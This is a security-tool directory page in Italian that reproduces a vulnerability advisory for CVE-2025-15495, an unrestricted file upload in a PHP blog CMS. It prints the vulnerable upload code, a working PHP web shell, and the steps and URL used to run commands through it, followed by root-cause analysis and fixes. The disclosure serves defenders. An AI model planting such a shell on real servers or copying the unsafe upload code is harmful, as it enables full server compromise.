Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RCE-Simplephpblog-biggiedroid — CVE-2025-15495 - Caricamento arbitrario di file che porta all'esecuzione remota di codice (RCE) | Kitploit
Strumenti/GitHubGitHub/asim-qazi/rce-simplephpblog-biggiedroid
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubasim-qazi/rce-simplephpblog-biggiedroid

RCE-Simplephpblog-biggiedroid

CVE-2025-15495 - Caricamento arbitrario di file che porta all'esecuzione remota di codice (RCE)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
7 mesi faNon ancora revisionato

CVE-2025-15495 - Caricamento Arbitrario di File Che Porta all'Esecuzione Remota di Codice (RCE)

Prodotto

BiggiDroid – Simple PHP Blog CMS Pagina del prodotto: https://biggidroid.com/product/simple-php-blog/

Tipo di Vulnerabilità

  • Caricamento Arbitrario di File
  • Caricamento di File senza Restrizioni
  • Esecuzione Remota di Codice (RCE)

Gravità

Critica

CVSS (Stimato): 9.8 (AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H)


Riepilogo

Il Simple PHP Blog CMS contiene una vulnerabilità di caricamento file senza restrizioni nella funzionalità di caricamento del Logo del Sito del pannello di amministrazione. Un attaccante autenticato può caricare un file PHP malevolo travestito da immagine, che viene memorizzato in una directory accessibile dal web ed eseguito dal server, portando all'esecuzione remota di comandi.


Componente Affetto

Pannello di Amministrazione → Aggiorna Logo del Sito

Estratto di codice vulnerabile rilevante:

root@kitploit:~
$target = "../image/".basename($_FILES['image']['name']);
$image = $_FILES['image']['name'];

$query = mysqli_query($con,
"UPDATE sitedetails SET sitelogo='$image' WHERE id='$id'");

if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
    // success
}

Problemi

  • Nessuna validazione dell'estensione del file
  • Nessuna validazione del tipo MIME
  • Nessun controllo del contenuto del file lato server

Prova di Concetto (PoC)

Creare un File PHP Malevolo

Crea un file chiamato shell.php:

root@kitploit:~
<?php
$cmd = $_GET['cmd'] ?? '';
echo "<pre>";
system($cmd);
echo "</pre>";
?>

Caricare il File tramite il Pannello di Amministrazione

  • Accedi al pannello di amministrazione
  • Vai su Logo del Sito → Aggiorna Logo
  • Carica shell.php come file logo
  • Invia il modulo

📌 L'applicazione accetta il file PHP senza validazione


Accedere alla Web Shell Caricata

Dopo il caricamento, il file è accessibile all'indirizzo:

root@kitploit:~
http://127.0.0.1/image/shell.php

Esegui comandi di sistema:

root@kitploit:~
http://127.0.0.1/image/shell.php?cmd=dir

Esecuzione del Comando Riuscita

Il server esegue comandi del sistema operativo e restituisce l'output, confermando l'Esecuzione Remota di Codice.


Prova di Concetto

  1. Pagina del Prodotto ProductPage
  2. Carica la Shell da questa posizione. shell
  3. Shell PHP ProductPage
  4. Esecuzione Remota di Codice rce
  5. Codice Vulnerabile code

Impatto

Un attaccante può:

  • Eseguire comandi arbitrari del sistema operativo
  • Leggere file di configurazione sensibili
  • Modificare o eliminare dati dell'applicazione
  • Caricare backdoor persistenti
  • Compromettere completamente il server di hosting

Questa vulnerabilità può portare alla completa compromissione del server.


Analisi delle Cause Radice

  • Assenza di whitelist delle estensioni dei file
  • Nessun controllo del tipo MIME
  • Uso diretto del nome del file fornito dall'utente
  • La directory di upload consente l'esecuzione di PHP
  • Nessun file .htaccess / hardening del server

✅ Correzioni Raccomandate

  1. Limitare le estensioni dei file

    root@kitploit:~
    $allowed = ['jpg','jpeg','png','gif'];
    
  2. Validare il tipo MIME

    root@kitploit:~
    finfo_file()
    
  3. Rinominare i file caricati

    • Usare UUID casuali
    • Non fidarsi mai dei nomi dei file forniti dall'utente

📚 Riferimenti

  • OWASP Unrestricted File Upload
  • CWE-434: Unrestricted Upload of File with Dangerous Type
  • OWASP Top 10 – A03: Injection

🧑‍💻 Scoperto Da

  • Mo Asim conosciuto anche come Asim Qazi
  • Github: @Asim-Qazi
  • Linkedin: Asim Qazi
  • Studente | Ricercatore di Sicurezza
Scarica lo strumento